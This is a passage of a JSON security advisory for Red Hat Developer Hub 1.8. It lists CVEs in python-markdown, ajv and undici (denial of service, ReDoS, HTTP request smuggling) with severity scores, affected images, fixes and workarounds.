["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2025-69534"}, {"category": "external", "summary": "RHBZ#2444839", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444839"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2025-69534", "url": "https://www.cve.org/CVERecord?id=CVE-2025-69534"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69534", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69534"}, {"category": "external", "summary": "https://github.com/Python-Markdown/markdown", "url": "https://github.com/Python-Markdown/markdown"}, {"category": "external", "summary": "https://github.com/Python-Markdown/markdown/actions/runs/15736122892", "url": "https://github.com/Python-Markdown/markdown/actions/runs/15736122892"}, {"category": "external", "summary": "https://github.com/Python-Markdown/markdown/issues/1534", "url": "https://github.com/Python-Markdown/markdown/issues/1534"}], "release_date": "2026-03-05T00:00:00+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "To mitigate this vulnerability, wrap your markdown parsing function in a try/except block. This catches the unhandled exception, preventing both the application crash and the stack trace leak.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "python-markdown: denial of service via malformed HTML-like sequences"}, {"cve": "CVE-2025-69873", "cwe": {"id": "CWE-1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2026-02-11T19:01:32.953264+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2439070"}], "notes": [{"category": "description", "text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.", "title": "Vulnerability description"}, {"category": "summary", "text": "ajv: ReDoS via $data reference", "title": "Vulnerability summary"}, {"category": "other", "text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2025-69873"}, {"category": "external", "summary": "RHBZ#2439070", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873", "url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"}, {"category": "external", "summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md", "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"}], "release_date": "2026-02-11T00:00:00+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "ajv: ReDoS via $data reference"}, {"cve": "CVE-2026-1525", "cwe": {"id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}, "discovery_date": "2026-03-12T21:01:33.639277+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2447144"}], "notes": [{"category": "description", "text": "A flaw was found in undici, a Node.js HTTP/1.1 client. A remote attacker could exploit this vulnerability by sending HTTP/1.1 requests that include duplicate Content-Length headers with different casing (e.g., \"Content-Length\" and \"content-length\"). This can lead to HTTP Request Smuggling, a technique where an attacker sends an ambiguous request that is interpreted differently by a proxy and a backend server. Successful exploitation could result in unauthorized access, cache poisoning, or credential hijacking. It may also cause a Denial of Service (DoS) if strict HTTP parsers reject the malformed requests.", "title": "Vulnerability description"}, {"category": "summary", "text": "undici: Undici: HTTP Request Smuggling and Denial of Service due to duplicate Content-Length headers", "title": "Vulnerability summary"}, {"category": "other", "text": "Moderate impact. A flaw in the undici Node.js HTTP/1.1 client allows for HTTP Request Smuggling or Denial of Service. This can occur in Red Hat products that use undici and process HTTP requests where user-controlled header names are not case-normalized, or headers are passed as flat arrays.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-1525"}, {"category": "external", "summary": "RHBZ#2447144", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447144"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-1525", "url": "https://www.cve.org/CVERecord?id=CVE-2026-1525"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1525"}, {"category": "external", "summary": "https://cna.openjsf.org/security-advisories.html", "url": "https://cna.openjsf.org/security-advisories.html"}, {"category": "external", "summary": "https://cwe.mitre.org/data/definitions/444.html", "url": "https://cwe.mitre.org/data/definitions/444.html"}, {"category": "external", "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm"}, {"category": "external", "summary": "https://hackerone.com/reports/3556037", "url": "https://hackerone.com/reports/3556037"}, {"category": "external", "summary": "https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"}], "release_date": "2026-03-12T19:56:55.092000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Moderate"}], "title": "undici: Undici: HTTP Request Smuggling and Denial of Service due to duplicate Content-Length headers"}, {"cve": "CVE-2026-1526", "cwe": {"id": "CWE-770", "name": "Allocation of Resources Without Limits or Throttling"}, "discovery_date": "2026-03-12T21:01:25.538271+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2447142"}], "notes": [{"category": "description", "text": "A flaw was found in undici. A remote attacker can exploit this vulnerability by sending a specially crafted compressed frame, known as a \"decompression bomb,\" during permessage-deflate decompression. The undici WebSocket client does not properly limit the size of decompressed data, leading to unbounded memory consumption. This can cause the Node.js process to exhaust available memory, resulting in a denial of service (DoS) where the process crashes or becomes unresponsive.", "title": "Vulnerability description"}, {"category": "summary", "text": "undici: undici: Denial of Service via unbounded memory consumption during WebSocket permessage-deflate decompression", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-1526"}, {"category": "external", "summary": "RHBZ#2447142", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447142"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-1526", "url": "https://www.cve.org/CVERecord?id=CVE-2026-1526"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"}, {"category": "external", "summary": "https://cna.openjsf.org/security-advisories.html", "url": "https://cna.openjsf.org/security-advisories.html"}, {"category": "external", "summary": "https://datatracker.ietf.org/doc/html/rfc7692", "url": "https://datatracker.ietf.org/doc/html/rfc7692"}, {"category": "external", "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q"}, {"category": "external", "summary": "https://hackerone.com/reports/3481206", "url": "https://hackerone.com/reports/3481206"}], "release_date": "2026-03-12T20:08:05.950000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "undici: undici: Denial of Service via unbounded memory consumption during WebSocket permessage-deflate decompression"}, {"cve": "CVE-2026-1528", "cwe": {"id": "CWE-248", "name": "Uncaught Exception"}, "discovery_date": "2026-03-12T21:01:36.954017+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2447145"}], "notes": [{"category": "description", "text": "A flaw was found in undici. A remote attacker could exploit this vulnerability by sending a specially crafted WebSocket frame with an extremely large 64-bit length. This causes undici's ByteParser to overflow its internal calculations, leading to an invalid state and a fatal TypeError. The primary consequence is a Denial of Service (DoS), which terminates the process.", "title": "Vulnerability description"}, {"category": "summary", "text": "undici: undici: Denial of Service via crafted WebSocket frame with large length", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-1528"}, {"category": "external", "summary": "RHBZ#2447145", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447145"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-1528", "url": "https://www.cve.org/CVERecord?id=CVE-2026-1528"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"}, {"category": "external", "summary": "https://cna.openjsf.org/security-advisories.html", "url": "https://cna.openjsf.org/security-advisories.html"}, {"category": "external", "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj"}, {"category": "external", "summary": "https://hackerone.com/reports/3537648", "url": "https://hackerone.com/reports/3537648"}], "release_date": "2026-03-12T20:21:57.775000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "undici: undici: Denial of Service via crafted WebSocket frame with large length"}, {"cve": "CVE-2026-2229", "cwe": {"id": "CWE-248", "name": "Uncaught Exception"}, "discovery_date": "2026-03-12T21:01:29.187989+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2447143"}], "notes": [{"category": "description", "text": "A flaw was found in the undici WebSocket client. A remote malicious server can exploit this vulnerability by sending a WebSocket frame with an invalid `server_max_window_bits` parameter within the permessage-deflate extension. This improper validation causes the client's Node.js process to terminate, leading to a denial-of-service (DoS) condition for the client.", "title": "Vulnerability description"}, {"category": "summary", "text": "undici: Undici: Denial of Service via invalid WebSocket permessage-deflate extension parameter", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-2229"}, {"category": "external", "summary": "RHBZ#2447143", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447143"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-2229", "url": "https://www.cve.org/CVERecord?id=CVE-2026-2229"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"}, {"category": "external", "summary": "https://cna.openjsf.org/security-advisories.html", "url": "https://cna.openjsf.org/security-advisories.html"}, {"category": "external", "summary": "https://datatracker.ietf.org/doc/html/rfc7692", "url": "https://datatracker.ietf.org/doc/html/rfc7692"}, {"category": "external", "summary": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"}, {"category": "external", "summary": "https://hackerone.com/reports/3487486", "url": "https://hackerone.com/reports/3487486"}, {"category": "external", "summary": "https://nodejs.org/api/zlib.html#class-zlibinflateraw", "url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"}], "release_date": "2026-03-12T20:27:05.600000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": 